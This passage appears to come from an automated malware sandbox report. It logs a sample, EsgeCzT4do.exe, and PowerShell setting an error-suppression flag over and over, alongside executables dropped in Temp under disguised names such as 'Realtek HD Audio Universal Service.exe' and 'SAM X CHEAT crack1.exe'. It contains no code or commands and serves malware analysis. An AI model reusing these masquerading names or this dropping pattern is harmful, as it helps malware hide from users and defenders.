                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
